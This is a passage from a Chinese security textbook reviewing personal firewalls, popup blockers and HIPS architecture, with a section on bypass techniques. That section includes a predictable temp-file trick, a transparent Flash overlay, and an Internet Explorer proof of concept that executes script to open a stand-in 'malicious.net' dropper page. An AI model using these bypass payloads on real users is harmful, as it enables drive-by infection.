个人防火墙是设计用于控制进出计算机的网络流量的基于主机应用程序,根据默认或者自定义的安全策略允许或者拒绝通信。个人防火墙在规模上与传统的防火墙不同,是设计用于最终用户的。个人防火墙只为工作于所安装的主机上的最终用户提供防御。大部分个人防火墙被配置为以两种模式操作:一是自动模式,这意味着防火墙根据安全策略允许或者拒绝流量;另一种是手动模式,这意味着最终用户选择所采取的措施。整体上,个人防火墙可以看做夜总会的保镖,评估所有出入的人,验证其可信性、行为和威胁。许多个人防火墙应用程序通过使用静态特征码集而具有入侵检测功能。但是,我们在稍后的第9章中将要讨论,基于特征码的检测引擎的好坏仅取决于特征码集。 大部分个人防火墙提供给最终用户或者管理员相当多的功能,例如: ·入站和出站连接警告。 ·关于主机流量的目标地址信息。 ·试图连接到主机的应用程序信息。 ·各种试图访问网络资源的应用程序的控制。 ·对自发流量隐藏系统,抵御远程端口扫描。 ·阻止本地应用程序未经许可访问网络上其他系统的企图。 ·监控监听入站网络连接的所有应用程序。 接下来,我们将评估一些较为流行的个人防火墙套件,指出其优缺点,以便提供无偏见的评论。它们都有自己的长处和弱点,并且在不同程度上很好地工作。然而,没有一种产品是与恶意软件的战斗中的杀手锏。 8.1.1 McAfee 我无法找到独立存在的McAfee个人防火墙。但是,McAfee已经在主机入侵预防系统(HIPS)和其他防病毒产品中设立了防火墙层次,作为一个可选的软件包而不是标准的应用程序,为试图保护系统的管理员或者家庭用户增加价值。定期更新的个人防火墙与HIPS软件包的结合和单独的产品一样引人注目。McAfee的防火墙模块确实能够完成所有标准功能,例如根据默认或者定义的规则文件,控制入站和出站流量和端口,以及试图获得网络访问权的应用程序。 它们的产品还提供了学习模块,使系统能够监控主机和网络之间的活动。这个学习模块为管理员提供了一个很好的根据主机网络行为历史记录生成策略的方式。现在我们快速地看看McAfee的一部分产品。 McAfee Internet Security 2009 过去几年,这个产品慢慢地展现了上升的势头,并在最近的版本中取得了一些飞跃,超过了一些竞争对手。McAfee的最新版本目前可以进行某些最快的恶意软件检测,还发布了主动保护,这和当今其他竞争对手所拥有的不同。例如,竞争对手Symantec公司提到每小时以及/或定期的(按照时间)更新检查。根据McAfee的文档,McAfee Internet Security在更新发布后立即更新。McAfee还在一个套件中提供了比竞争产品Symantec Internet Security和ZoneAlarm Internet Security更多的功能。除了个人防火墙、防病毒、防仿冒以及防间谍软件以外,McAfee还提供了备份与恢复功能以及多个方便的实用程序。 与其他相似的套件一样,McAfee Internet Security 2009具有被称作主动保护的新功能,使产品能够通过启发式检测发现和删除仅仅诞生几分钟的新威胁,用内建的特征码文件发现和删除已知的威胁。发现新威胁时,主动保护通过互联网发送一个通知到McAfee Internet Security 2009数据库,并且立即接收新的更新以删除该威胁。这种功能可能使一些管理员感到有些不舒服,但是最终是物有所值的,因为它使你更快地响应活动的威胁。这个新的模块还提供一个接近于立即更新的机制以及比竞争对手领先得多的特征码数据库。总体上这个套件的功能很多,也很强大;McAfee的个人防火墙有很漂亮的用户界面,但只是一个标准的基于软件的防火墙模块。然而,与McAfee Internet Security套件的整体特性结合,它就是一个强大的产品。 McAfee Total Protection for the Endpoint 这个软件包提供一个个人防火墙,包含了McAfee最新的与McAfee AVERT labs相结合的Total Protection(全面保护),全面保护在一个可用于企业的解决方案中包含了防病毒和威胁保护,其易用性和伸缩性使其可用于中大型企业。McAfee Total Protection还可以由McAfee ePolicy Orchestrator进行管理以得到集成和有效的集成安全,这些产品通过McAfee的Total Protection平台持续地更新。这个系统覆盖了一般用于威胁注入、服务器、电子邮件服务器和桌面的企业关键系统策略。这个企业解决方案是许多私有企业和政府机构的首选。 McAfee提供的功能性 下表列出了McAfee产品的功能性,你可以评估每种产品,了解它是否符合你的企业的要求。 8.1.2 Symantec Symantec公司是另一家销售多种防范基于网络和主机威胁的端点保护应用程序的安全型供应商。每种产品都有自己的关注点而具备相似的后端功能,例如Norton Personal Firewall和Symantec's Endpoint Protection。大部分Symantec产品线互相捆绑,提供一站式网络主机保护。我们来看看它的一些产品。 Norton Personal Firewall 这个产品是一个基于主机防火墙应用程序,具有基本防火墙的基于规则保护、广告封堵、可以阻止有害的网络或者个人信息泄露的隐私功能,以及在主机运行于多个网络上时启用不同规则的选项。这个产品在两年前终止,但是现在捆绑在其他产品如Norton Internet Security和Norton 360中。在这个应用程序中,广告封堵功能一般通过重写用户浏览器已经显示的网页的实际HTML代码来保护你的主机。它在代码中搜索,识别启动弹出式窗口或者广告的功能并且阻止其显示。这个模块和许多其他程序类似,将阻止ActiveX插件在主机上运行,避免潜在的感染。 Norton Internet Security 这个产品线为用户提供明显的价值。在计算机上默认安装时,这个应用程序不太受欢迎,因为在你第一次进入时会遇到密集的通知、更新和警告。这个程序所拥有的功能,差不多都得到了臃肿和低效的坏名声。但是2009年最新的版本不是如此,它进行了裁剪,减少了对系统性能的影响,并且改进了对威胁的响应能力。值得一提的另一点是个人防火墙,这是另一个基于软件的防火墙,由于与一起提供的其他模块的集成性,只有在这个套件中才表现得更强。总体来说,这是一个为家庭用户开发的好产品,但是作为企业解决方案效率和可管理性还不够。 Norton 360 这个产品被认为是Symantec最全面的产品。Norton 360提供一个个人防火墙,加上一些附加的安全和灾难恢复功能。这个套件很容易使用并且清晰地分为各种功能区域:PC安全、身份保护、备份和PC调整,选择选项时每个区域都有自己的下拉菜单。PC安全部分包括防病毒和防火墙组件,具有帮助Internet Explorer阻止客户端利用的一些较新的功能。身份保护部分在Internet Explorer和Firefox浏览器中添加了一个防范已知和/或可疑的仿冒网站和基于浏览器的身份盗窃攻击的工具栏。这些功能确实要花费时间来实施并且占据了用户的浏览时间,但是最终能够有助于对抗基于客户端的恶意软件攻击。在PC调整部分,你会找到清理主机、最小化可能被恶意软件窃取而导致身份盗窃的残留信息的功能,但是最重要的是,你会发现一个扫描和清理注册表中无用和潜在的恶意注册表项的模块。但是对于企业解决方案,我们将会避开Norton 360而只选择Symantec Endpoint Protection,因为如果你的用户开始闲逛而不让管理员进行工作,丰富的功能只会弊大于利。 Symantec Endpoint Protection 这个系统是为企业网络开发的,具有几乎一站式的便利安全管理能力。Symantec Endpoint Protection提供一个个人防火墙、威胁保护以及一个防病毒引擎,这些模块都协同工作于一个可伸缩和易于管理的套件中。这个企业系统创建了围绕PC的几乎完整的保护圈。最有用的组件是根据威胁行为以及/或启发式方法扫描零日攻击的TruScan模块。这个系统也有一个设备控制功能,包含了基于策略的保护,防止用户将文件复制到像USB存储设备这样的未授权设备。它还包含了防范恶意软件的防病毒和防间谍软件功能(除了防Rootkit保护)。最后,除了防火墙以外还有一个防范网络威胁的网络IPS模块,使其成为全面的产品。 Symantec提供的功能性 下表列出了Symantec产品的功能性,你可以评估每种产品,了解它是否符合你的企业的要求。 8.1.3 Checkpoint 尽管Checkpoint因其网络防火墙产品而著称,但是近年来该公司已经在产品中添加了基于主机的防火墙,并且创建了真正的产品套件。在本小节中,我们将介绍Checkpoint当前的基于主机防火墙的产品,覆盖范围从个人/家庭保护到企业服务器/工作站的保护。 ZoneAlarm Internet Security 这个基于软件的防火墙应用程序已经属于CheckPoint并且活跃了将近10年。这是一个具有稳定的客户基础的成熟产品,因为大部分消费者都乐于享受它的用户界面和产品工作流,它将网络访问分区(zone)。这个产品包含一个入站入侵检测系统以及标准的防火墙功能。用户界面的管理很简单,提供简单地指定允许或者拒绝访问的连接的管理能力。很容易描述许可设置,例如信任区域客户、信任区域服务器、互联网区域客户以及互联网区域服务器——这些设置可以应用到任何试图获得网络或者主机访问权的应用程序。这个个人防火墙可靠并且能够使用正确的管理工具为企业提供很多功能。ZoneAlarm仍然作为单独(并且免费)的基本防火墙提供,还有ZoneAlarm Pro、ZoneAlarm Antivirus、ZoneAlarm Internet Security和ZoneAlarmForceField等不同产品,所有产品都吸收了传统的ZoneAlarm风格,并根据你的需要添加模块。 CheckPoint Endpoint Protection 这个端点保护套装过去是由ZoneLabs开发的基于软件个人防火墙ZoneAlarm。ZoneAlarm的下一代是CheckPoint Endpoint Security,提供了比普通个人防火墙更多的功能。这是和Symantec Endpoint Security相似的企业解决方案,每个主机向管理系统报告,并且可以由网络管理员远程控制及更新,而不是每个端点自行管理(这是管理的噩梦)。这个套件组合了多个端点保护模块,如传统的个人防火墙以及防病毒、防间谍软件、整个磁盘加密以及媒体加密,具备应用程序/端口保护、网络访问控制(NAC)、应用程序控制和内建VPN。由于这些功能,它远远比其他竞争者强大,那些竞争者都没有在单个解决方案中构建所有这些功能。 CheckPoint提供的功能 下表列出了CheckPoint产品的功能性,你可以评估每种产品,了解它是否符合你的企业的要求: 8.1.4 个人防火墙的局限性 虽然个人防火墙能显著地改进你的企业网络安全态势,但是它们也将天生的局限性和弱点引入企业网络。个人防火墙并不减少网络感知的服务,它是一个消费系统资源并且可能成为攻击目标的附加服务;设想一下第一个针对个人防火墙的蠕虫Witty Worm。 Witty Worm 恶意软件系统Witty Worm最早发布于2004年,并不像它的兄弟们那样具有传染性。但是,在这里提及它的原因是它的主功能之一,即完全绕过特定供应商的基于主机的个人防火墙。你会问它是如何做到的?好,让我们来回忆一下。 在被发现的时候,Witty Worm已经在不到一个小时内顺利地感染了大约12 000个非家庭系统。这个蠕虫不能到达更多系统的主要原因是它所针对的系统。这些受害者都运行了RealSecure的BlackICE个人防火墙。Witty也只感染和摧毁具有特定版本的BlackICE的计算机,所以这种蠕虫的生命期很短,因为它与其他应用程序不兼容及/或没有添加繁殖功能。同样,我们来看看这种蠕虫如此成功地战胜个人防火墙的一些原因。 开发 Witty本身的繁殖技术有限;它直接针对运行BlackICE版本的网络系统。在感染时,Witty Worm仅仅利用有漏洞的ICQ响应,在ISS产品的协议分析模块(PAM)中解析并且在内存中运行,这里它可以简单地扫描其他有漏洞的主机并且试图从受感染的主机进行传播。 结果 前面已经提到,这是第一个专门针对个人防火墙平台的蠕虫,所以要记住更新软件产品,并且定时检查安全型供应商的网站,阅读关于针对你的系统的未被察觉的任何新攻击内容。你可以看到,一旦主机被恶意软件感染,恶意软件能够操纵任何运行在主机上的应用程序,包括个人防火墙。恶意病毒能够修改、完全避开甚至关闭防火墙软件。 如果你的个人防火墙没有正确地调整,可能会生成太多的警告,使你缺乏分辨真正的警告和假阳性的敏感性。基于特征码的软件防火墙对于特征码引擎难以识别的变种攻击也是脆弱的。最终,基于软件的个人防火墙可能遭到任何基于内核的攻击,以及/或有意无意地注入到主机上运行的任何应用程序的安全缺陷的破坏。 个人防火墙攻击 许多攻击可以用来避开基于软件的个人防火墙。我们将阐述几种可以攻击基于Windows的防火墙的方法。例如,遭到Sasser攻击的LSASS漏洞是利用了RPC DCOM漏洞,这个漏洞提供了主机的管理访问权。使用这种后门访问,攻击者可以修改或者禁用软件防火墙而不为用户所知。如果恶意软件可以以管理权限运行,则不必避开基于软件的防火墙,因为攻击者可以简单地在防火墙规则上打开一个洞,而不向用户显示,这是由于这些操作在ring 0受到保护。 攻击者也可以阻止你的主机访问更新网站获取操作系统补丁、防病毒特征码更新及/或你的个人防火墙应用程序更新。一旦你的操作系统受到感染而且攻击者得到管理权限,恶意软件就可以使用任意的方法来危害你的操作系统。 个人防火墙对策 为了避开这些类型的攻击,尽可能在最低的层次(即NDIS层)进行过滤。如果过滤在较高的层次进行,那么绕开基于软件的防火墙几乎总是很容易。没有人说NDIS过滤是完美的,但是它的许多弱点得到保护,而且在这个层次里,是目前监控网络应用程序的最佳方法。虽然NDIS过滤仍然是最好的措施,但是设计和维护NDIS使其进行更强的过滤也更加困难,因为使用较高的层次过滤的操作稍后可以在NDIS层中进行分析。你会发现在NDIS层中分析所有加密的流量或者应用程序更容易,因为所有通信在这里都是未加密的。你还可以实现一些攻击方法,以替换、更新以及/或表现的像NDIS驱动程序一样,这将突出你在主机上监控事件的能力。保护这些关键应用的最重要方面是监控驱动程序本身,确保它们不受篡改。你还可以监控API调用,提供更多的保护层次。 8.2 弹出窗口拦截程序 这类主机保护方法由Opera浏览器在21世纪初引入。到2004年,几乎所有Web浏览器都包含了某种水平的弹出式广告拦截,以增加最终用户在互联网上冲浪时的安全。现在,默认情况下,你会在浏览器中找到广告拦截,还会在第三方应用程序中发现这一功能;这些第三方应用程序需要和个人防火墙相似的系统资源要求并且需要付费,但是它们专注于阻止弹出式广告。 在第2章中我们介绍过,恶意软件采用弹出广告作为诱骗用户以各种方式单击窗口的一种方法。有时候甚至单击右上角的“X”(关闭)框都会启动恶意代码的执行,这些代码之后就在主机上运行。开始,弹出式窗口是一种吸引用户注意力的直接广告方法。但是,随着时间的推移,地下组织发现可以使用这些弹出式窗口作为绕开浏览器安全并且直接在不为用户所知的情况下进行感染的方法。最活跃且最具毁灭性的弹出式窗口是带有活动内容的、基于Flash的弹出式窗口,活动内容的执行除了简单的“鼠标悬停”之外,不需要用户进行任何其他操作。 另一种出现多年的弹出式窗口类型是,要求用户安装第三方插件以便查看某些网页上的活动内容的“远程安装”窗口。没有意识到这类威胁的用户将安装这个插件,而不知道它包含了执行后门下载程序或者第一阶段木马下载的嵌入代码,然后这些代码将在主机上运行并从用户不知道的网站上下载更多的恶意内容。各种浏览器都尝试阻止这类静默安装,方法是要求用户在单击链接绕过弹出窗口过滤器时按下Ctrl键。 在本节中,我们将介绍一些当今占统治地位的Web浏览器,以便更好地理解它们保护你的主机免遭恶意软件感染的能力。在“弹出式窗口拦截程序攻击”小节中,我们将帮助你更好地理解为什么大部分弹出式窗口拦截程序不能让你感觉温暖和安心。 8.2.1 Internet Explorer 随着Windows XP Service Pack 2(SP2)的引入,Internet Explorer允许用户阻止大部分弹出式窗口出现,除非你按下Ctrl键。这个弹出式窗口拦截程序是Microsoft在2004年第一次将弹出窗口拦截引入Microsoft Windows平台。安装SP2时,默认的Internet Explorer弹出式窗口拦截程序设置是安全级别“中”,阻止大部分弹出式窗口,除非你按下Ctrl键或者在Internet Explorer的Internet选项设置窗口中定义该网站为信任网站。 8.2.2 Firefox Mozilla的Firefox是当今另一个广泛使用的重要浏览器。这是我个人首选的浏览器,在每个我使用的机器上都选择了该浏览器。Firefox的弹出式窗口的优势在于多种保护级别,允许用户完全定义弹出式窗口的使用级别,甚至在默认的配置中,它不需要用户进行任何启用或者允许特定弹出式窗口的操作就能阻止所有弹出式窗口。它提供的保护将每种弹出式窗口分为警告、通知用户和要求用户采取措施。尽管Firefox在阻止弹出式窗口上做得很好,但是仍然有和其他互联网浏览器类似的弱点。尽管Firefox阻止大部分弹出式窗口,但是一些网站能够执行远程弹出式代码。我们来谈谈一些这类代码…… 所有远程网站被阻止访问file://命名空间,这禁止了本地文件访问(读或者写)。但是当用户决定允许一个被拦截的弹出式窗口时,将会绕过常规的URL权限。发生这种情况时,攻击者能够欺骗浏览器检查本地文件系统上一个预定义的路径中保存的HTML文件,实际上读取了用户曾经访问过的所有网站的所有文件。这个文件之后可以在远程服务器重现,为攻击者提供关于用户曾经访问的网站以及访问频率的信息。这一过程使攻击者能更好地了解你所去过的网站以及访问的频率,他可以在其他时候再次直接地针对你。 8.2.3 Opera Opera是第一个引入弹出式窗口拦截的浏览器,在这里提及它很重要,尽管它并不是现在最广泛使用的浏览器。与其他浏览器类似,弹出式窗口拦截设置也可以在浏览器的工具/首选项中找到。但是Mac用户必须单击窗口顶部,然后单击首选项链接。Mac Opera浏览器最有趣的特性是其处理弹出式窗口的方式,它们被放到浏览器的垃圾箱里,如果你决定重新查看一个弹出式窗口,可以到那里去浏览。如果你在标准的Microsoft Windows上运行Opera,你将接收到有关你已经阻止的弹出式窗口的一个弹出式通告。整体上,Opera是第一个弹出式广告拦截程序,和其他产品一样强大,但也有相同的弱点。 8.2.4 Safari Safari由苹果公司开发,是Mac OS中的自带浏览器。Safari在2007年1月的Mac OS X操作系统上发行了beta版本,现在已经成为过去这10年Mac OS的事实标准。Safari的弹出式窗口拦截程序是另一个具有有趣功能的合法浏览器工具,提供了一个简易的选项Command-K来开关弹出式窗口拦截程序。你还可以单击Safari菜单选择拦截弹出式窗口。与其他程序类似,Safari的拦截程序阻止除浏览器广告中最先进的Flash弹出式窗口之外的几乎所有弹出式窗口。关于Safari浏览器的缺陷经常公布并且往往很快地修补。整体上,Safari浏览器相对其他一些主流浏览器来说是稳定的、经过测试的并且快速修补的。 8.2.5 Chrome Chrome与G公司搜索引擎的联系使其成为目前为止最强大的浏览器之一,具有丰富的特性,可以使用你的GAccount存储、索引、搜索和共享信息。尽管Chrome与搜索引擎巨人连接,但和其他浏览器一样容易受到漏洞和攻击的影响。与Safari类似,Chrome也在2008年遭受了地毯式轰炸攻击。Chrome和其他浏览器的显著不同是它具有一个弹出式窗口隐藏模块,而不是阻止弹出式窗口执行。这个模块不禁用弹出式窗口,而是允许弹出式窗口在一个受保护的空间里打开,这样互联网广告仍然产生收入并且为有偿服务打开了一扇窗户。这种设计的另一个好处是不会影响G公司的AdWords客户,因为G公司不销售弹出式广告。 下面是其他拦截弹出式广告的浏览器列表: ·America Online 9.0 ·Avant Browser ·Enigma Browser ·Gecko-based browsers ·Camino ·e-Capsule Private Browser ·Epiphany ·Flock ·Galeon ·K-Meleon ·Mozilla ·Netscape 7 and 8 ·SeaMonkey ·iMacros ·Konqueror ·Links ·Maxthon ·Netcaptor ·OmniWeb ·Slim Browser ·Smart Bro ·Gosurf Browser 下面的附加程序也能拦截弹出式广告: ·Adblock ·Adblock Pro ·Alexa Toolbar ·Bayden Systems ·Google Toolbar ·IE7pro ·MSN Toolbar ·NoAds(免费软件) ·NoScript(开源,GPL) ·Popupcop ·Popup Killa(免费软件) ·Pop-Up Sentry! ·Pop-up Stopper ·Privoxy ·Proxomitron ·Quero Toolbar ·Super Ad Blocker ·Speereo Flash Killer(免费软件) ·STOPzilla ·Yahoo!Toolbar 8.2.6 一般的弹出式窗口拦截程序代码实例 有很多构建或者绕过弹出式窗口拦截程序的方法。这里的例子只是阐述任何人都能够使用相似的方法很容易地建立自己的弹出式窗口拦截程序: // //IOleObjectWithSite Methods // STDMETHODIMP CPub:SetSite(IUnknown*BUnkSite) { if(!pUnkSite) { ATLTRACE(_T("SetSite():BUnkSite is NULL\n")); } else { //Query pUnkSite for the IWebBrowser2 interface. m_spWebBrowser2=BUnkSite; if(m_spWebBrowser2) { //Connect to the browser in order to handle events. HRESULT hr=ManageBrowserConnection(ConnType_Advise); if(FAILED(hr)) ATLTRACE(_T("Failure sinking events from IWebBrowser2\n")); } else { ATLTRACE(_T("QI for IWebBrowser2 failed\n")); } } return S_OK; } 弹出式窗口拦截程序攻击 尽管弹出式窗口拦截程序有许多好处,但是它们也能够被避开。广告商不断支持绕开弹出式窗口拦截程序的方法,以得到他们的按单击付费和直接广告市场。大体上,绕过弹出式窗口拦截程序随着时间推移越来越难;然而,攻击者(和广告商)依然能够避开弹出式窗口拦截程序。是什么使得一个系统容易受到弹出式窗口的攻击?这个问题提得好! 为了提高攻击效率,攻击者必须植入能够很容易地预测和执行的文件,以便利用目标系统。所有主流浏览器有时都会在临时目录中创建完全确定性的文件名,这些临时目录在打开频繁访问外部应用程序的文件时可用。大部分临时文件使用有缺陷的算法如nsExternalAppHandler:SetUpTempFile等创建。问题是stdlib线性同余伪随机数生成器(srand/rand,即srand和rand支持随机数生成)在文件创建之前用以秒计算的当前时间作为种子。接下来,rand()可以用于直接生成一个“不可预测”的文件名。一般,如果PRNG只在程序启动时选择一次种子,在后续的调用中结果将是确定性的,但是在实际中难以盲目预测。这项任务现在变得简单得多了:我们知道何时开始下载;种子是什么;并且知道后续有多少个调用——于是我们知道了结果。 弹出式窗口覆盖 前面提到的一些最现代的躲避弹出式窗口拦截程序的方法,包含基于Adobe Flash的攻击。这种方法很简单,因为它允许一个嵌入式Flash动画片段执行。用户一般将他的鼠标移到小的关闭框上,而完全透明的Flash广告被直接投影在浏览器的网页之上,没有任何关闭窗口的选项。这种方法被称为弹出式窗口覆盖(pop-up overlay)。看看后面的例子,不需要任何弹出式窗口就能运行。这种覆盖也可以在鼠标放置在动画之上或者在动画中设置时间表期间运行可执行代码。 <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab #version=5,0,0,0" width="32"height="32"> <param name=movie value="http://www.suspectURL.com/animation.swf"> <param name=quality value=high> <embed src="http://www.allsyntax.com/movie.swf"quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi ?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"width="32"height="32"> </embed> </object <param name="wmode"value="transparent"> 悬停广告 这种攻击组合了一个横幅广告和一个弹出式窗口,使用DHTML以出现在浏览器屏幕的前面。当与JavaScript一起使用时,这种方法也可以像一个透明的弹出式窗口一样工作,和Flash覆盖类似。用这种方法较容易感染用户的工作站,所以最安全的方法就是在浏览网站时禁用JavaScript。下面这个例子很普通,但是说明了创建这种广告有多容易: <script type="text/javascript"src="adv.js"></script> <link rel="stylesheet"href="adv.css"type="text/css"/> <div id="a1"class="adv"><table border="0"width="100%"> <tr><td align="center"><a href="http://www.victim.com/"><img src="hoopla.gif" width="65"height="55"border="0"alt="victim Pty Ltd"/></a> </td></tr></table> <p align="center">Would you like to be infected?</p><p align="center"> <cTypeface:Bold>We can help.</b></p><p align="center"><a href="http://www.victim.com/"> Ask 0wnage</a><br/>With something really nasty?</p><hr/><p align="center"> <a href="#"onclick="showAd('a1',0,0)">Close</a></p></div> 下面是另一个对Microsoft Windows Service Pack 2的Internet Explorer执行恶意代码的例子。这段代码允许攻击者执行JavaScript代码,将虚假的允许网站加入弹出式窗口拦截程序的信任列表。这个例子有点老旧,但是具有概念验证性,能够说明这种方法。 <body onload="setTimeout('main()',1000)"> <object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="1" height="1" align="middle" > <PARAM NAME="ActivateApplets"VALUE="1"> <PARAM NAME="ActivateActiveXControls"VALUE="1"> </object> <SCRIPT> //http://www.example.com function shellscript() { open("http://www.malicious.net/dropme.html","_blank","scrollbar=no"); showModalDialog("http://www.malicious.net/dropme.html"); } function main() { x.DOM.Script.execScript(shellscript.toString()); x.DOM.Script.setTimeout("shellscript()"); } </SCRIPT> <br><br><br><br><br><br><center><img src=woot.gif><br><br><FONT FACE=ARIAL SIZE 12PT>W0OT</FONT></center> 弹出式窗口拦截程序对策 现在,弹出式窗口拦截程序的最佳对策是保护你的主机并且正确地为你的弹出式窗口拦截软件配置策略和安全级别。底线是确保你安装了所有最新的浏览器补丁,因为浏览器是主要的注入方向。除了这些简单的方法和注意事项,作为用户,你没有太多可做的。 8.3 小结 你的主机是当今威胁局面下的第一个和最后一个堡垒,嵌入到防范攻击者及其工具的前线。过去的几年除了蠕虫或者bot,没有看到太多从主机到主机的直接网络攻击。然而,作为一个管理员,你将看到越来越多直接的方法,包括鱼叉仿冒、客户端利用以及文档中的嵌入代码。所有这些方法都指向最终用户及其容易上当的特性,他们会打开、执行以及/或浏览不安全的网站,或者登录并且单击按钮。 最后,你确实需要维护尽可能多的保护措施,以确保主机远离攻击者和那些好奇并且有时候只为了看看发生的情况而弄乱设置的用户。本章包含了许多可供挖掘的信息,但是作为管理员,必须了解什么工具能够保护你的最终用户和企业资产。对于保护企业主机,没有什么是比确保你更新到最新的安全解决方案更重要的。你的企业主机处于前线,攻击者只需要访问到一个系统,一切就都太晚了。 第9章 基于主机的入侵预防 简单地说,基于主机的入侵预防系统(HIPS)是监控本地操作系统和安装的应用程序,以便防范未授权的执行以及/在本地主机上恶意进程的启动的一种基于主机的应用程序,而网络入侵预防系统(NIPS),尽管表现相似,但设计的目的是保护网络而不是单个主机。入侵预防系统实时监控系统活动以寻找特定的恶意行为,然后试图阻止及/或避免这些进程执行。HIPS系统一般用于保护关键的企业服务器和用户工作站免遭实时的可移动代码爆发,这些代码一般利用在企业中运行时产生的信任。 9.1 HIPS体系结构 HIPS一般是企业中提供入侵检测和入侵预防的许多组件之一。许多供应商提供插入企业网络的“全寿命”或者“包围式”的IDS/IPS解决方案。下面是一些你在基于主机的入侵预防系统中通常会找到的组件: ·安全信息管理服务器(SIM) 这是安全系统基础结构管理服务器的常用名称。SIM一般利用其他企业安全设备而不只是IDS/IPS系统的信息。SIM使你能从防火墙、服务器、防病毒产品以及许多其他日志中接受安全信息,给你一个清晰的网络分析视图。 ·基于主机的入侵防御系统(HIDS) 这是一个监控计算机入站和出站通信以及应用程序的被动式IDS。这类IDS只发出警告而不试图拒绝或者阻止可疑的操作,而HIPS试图拒绝或者阻止入侵。 ·网络入侵检测系统(NIDS) 这种被动式的IDS可监控网络并且对可疑活动提出警告。这种报警机制或者方法仅仅根据你所拥有的入侵检测系统的类型或者家族(行为或者特征码)而定。 ·网络入侵预防系统(NIPS) 这种主动式的入侵检测能识别可疑活动并且拒绝网络访问,从而阻止恶意软件攻击和传播。 下面是一些简单的说明HIPS的常见体系结构的图解,解释了HIPS如何补充其余的入侵监测网络,达到预防恶意软件爆发的最佳效果。 工作站视图 图9-1显示了HIPS在所有工作站上的放置,提供工作站的预防性保护。 网络视图 在网络中使用入侵预防系统时,你一般应该将用户和服务器分割为不同的段,以便快速地识别网络的哪一端遭受最新的恶意软件感染。你可以在任何两段之间再分段。这种方法在阻止恶意病毒传播时很有用。 服务器视图 在图9-1中的服务器段,你看到混合的各自分离的HIDS和HIPS。有些经营者希望在关键系统上使用被动式入侵检测,这样日常业务运作不会受到影响。这是谨慎的业务方法,因为应用程序有时候会有预期之外的表现并且偶尔会拒绝对关键应用程序的访问。 工作站视图 图9-2也显示了HIPS在所有工作站上的放置,这提供了工作站的预防性保护。在图9-1中可以看到,这种方法在与恶意软件战斗时是非常稳定的纵深防御。 网络视图 在图9-2中你可以看到,在两个网端上都实施了被动式的入侵检测。这种配置能够发现恶意软件,但是在拒绝恶意软件网上运行方面不进行任何操作。 图 9-1 服务器IDS、网络IPS以及基于工作站的IPS体系结构 图 9-2 基于网络和基于主机混合的IPS和IDS体系结构 服务器视图 在图9-2的整个服务器段中,你再次看到混合的各自分离的HIDS和HIPS。我们曾经见过的几乎所有网络都有某种水平的混合HIDS和HIPS服务器场,这是因为业界关于主要网段之间的入侵预防系统的迷信,以及在访问所提供的信息时,由于IPS关闭一个连接而造成的可疑操作。因为这种迷信有时候会成为事实,管理者在提到关键系统上的HIPS时有理由感到紧张。 工作站视图 在图9-3中,HIPS也放置在所有工作站上,提供预防性保护。整体上,这是在网络上实施HIPS的建议配置。工作站是最有可能被感染的网络组件。 网络视图 你只能将具有可用于每个网段之间的超过一个LAN接口的高端NIPS用在这种方法中。使用这种方法,可在一个设备掌握网络持续性的命运时为这些配置建立冗余,这是个好主意。 服务器视图 图9-3中显示的配置在你不能做任何冒险且安全远比操作重要时有用。在你希望尽可能快地阻止恶意软件在服务器上传播时,部署这种服务器保护。 图 9-3 基于网络和主机的IPS体系结构 9.2 超过入侵检测的增长 入侵预防技术的先驱是入侵检测,在这种技术中,实现静态的特征码集以便识别网络或者主机上不需要的以及/或恶意的流量。IPS比IDS有多种优势,具体地说,IPS设计为嵌入到通信流中预防攻击,而不是在线路上空转,只在发生了安全人员可能注意或者不注意的事件时发出一个警告。大部分IPS还能够检查和解码网络封包到第7层(应用层),提供对穿越网络的实际数据内容更深入的观察,这是当今的攻击所隐藏的地方。封包解码(parket decoding)是取得二进制数据并且将其传递给一个引擎,再由该引擎解码为人类可读的形式的一个过程。在封包检查的分析阶段,分析人员将审核解码后的封包内的信息,试图验证检测到并且可见的网络活动。 加密的网络流量无法分析——这是隐蔽信道的另一个实例。用于保证通信安全的加密过程在两个主机和传统IDS之间处理,但是这个过程无法拦截解密数据流所必需的会话密钥。然而,如果在加密流通过时配置了嵌入式IPS,IPS能够处理每个封包,看到数据流的内容,并且将解码后的流传递给漏洞和攻击分析模块以进行更深入的封包检查。 HIPS在许多方面都更强大,因为它不需要大部分基于特征码的产品所需要的常规更新机制,它的目标是识别恶意软件执行时的表现。HIPS将识别恶意软件修改系统状态以便执行其预期设计的方法,而不是(就像IDS那样)依靠一个特征码来识别攻击方向。如果配置好了HIPS,它能够监控系统或者用户执行的进程所作出的修改。HIPS一般有提供“标准”覆盖级别的默认模式。然而,因为每个网络都有某种程度的不同,你的企业的每个主要策略都必须有自己的“定制”策略。 更可靠的HIPS应该具备防Rootkit模块,对于悄悄得到系统内核控制权和主操作系统控制权的每种可能的方法进行检查。和传统的容易被轻松击败的基于特征码系统不同,HIPS寻求应用程序工作的真正方法。有许多像VirusTotal.com这样的网站使恶意软件编写者能够避开基于特征码的引擎。这些网站有助于测试防病毒特征码的精确性。它们的“罗宾汉(robin hood)”式方法是杰出的并且能够做很多好事。它们能够接受各种二进制文件上传,然后分析上传的文件以评估所有主要的防病毒特征码。上传者(恶意软件编写者)完成分析报告并且确定他所构建的程序不会被足够比例的防病毒引擎发现之后,如果他分发这段恶意代码,就是犯罪。HIPS不管是基于特征码还是行为的,都可以设置为被动或者主动模式,并且在需要的时候有能力捕捉加密通信。 9.3 行为与特征码 HIPS可以是基于行为(基于策略或者专家系统)或者特征码规则集合的。基于策略的HIPS一般使用清晰定义的有关应用程序许可或者不许可的行为规则集合,提示用户可能的恶意活动并且要求用户“允许”或者“阻止”该操作。专家系统更加复杂,因为它们使用规则的扩展,每当一个操作发生时进行计分和评估,然后为用户做出决策,这个决策可能跟随着一个提示,要求用户“允许”或者“阻止”该操作。 最后,HIPS可以配置为不需要管理员参与,因为系统可以配置为根据网络行为训练(调整)允许或者阻止。这种配置可能会令人头痛,但是如果坚持并且适当地调整HIPS系统,回报是很丰厚的。 